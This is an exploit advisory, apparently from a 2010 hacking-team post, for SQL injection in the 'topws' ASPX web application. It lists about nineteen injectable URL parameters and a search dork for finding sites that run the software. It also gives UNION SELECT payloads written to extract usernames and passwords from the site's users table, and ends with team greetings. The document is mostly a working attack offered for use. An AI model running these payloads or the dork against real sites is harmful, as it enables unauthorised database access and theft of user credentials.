topws (.aspx) Multiple Sql Injection Vulnerability =================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Email : F.Hack@w.cn .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : topws .:. Language : aspx .:. Script Download: http://www.topwnet.com/ .:. Bug Type : Sql Injection[Mysql] .:. Dork : "Site powered By Topws.com" .:. Date : 31/1/2010 #################################################################### ===[ Exploit ]=== www.Localhost.com/show_medical_articles_details.aspx?mid=[Sql Injection] www.Localhost.com/show_news_details_ar.aspx?id=[Sql Injection] www.Localhost.com/show_photogallery_details.aspx?cid=[Sql Injection] www.Localhost.com/show_page.aspx?pid=[Sql Injection] www.Localhost.com/show_events_details_ar.aspx?id=[Sql Injection] www.Localhost.com/show_courses_details_ar.aspx?id=[Sql Injection] www.Localhost.com/marquee_details.aspx?mid=[Sql Injection] www.Localhost.com/show_consultations_details_ar.aspx?id=[Sql Injection] www.Localhost.com/show_prev_courses_details_ar.aspx?id=[Sql Injection] www.Localhost.com/show_consultations_details.aspx?id=[Sql Injection] www.Localhost.com/show_members_detail.aspx?id=[Sql Injection] www.Localhost.com/show_forum_pics.aspx?id=[Sql Injection] www.Localhost.com/similar.aspx?pid=[Sql Injection] www.Localhost.com/news.aspx?pid=[Sql Injection] www.Localhost.com/show_similar.aspx?id[Sql Injection] www.Localhost.com/showdtls.aspx?id=[Sql Injection] www.Localhost.com/show_medical_articles_details_ar.aspx?mid=[Sql Injection]&home=y www.Localhost.com/show_box_details.aspx?bid=[Sql Injection] www.Localhost.com/show_istshareen.aspx?id=[Sql Injection] ETC.......... *********************************************************************************** ===[ ERROR ]==== Syntax error in string in query expression '[id]=''. *********************************************************************************** ************************************************************************************* ######## Name TableName : users EXPLOIT| Name ColumnName: Id,Username,Password ######## null+union+select+1,username,3,4,password,6,7,8+from+users+where+id=1 null+union+select+1,username,3,password+from+users+where+id=1 null+union+select+username,2,password+from+users+where+id=1 ETC.......... ************************************************************************************* #################################################################### Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack ________________________________ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.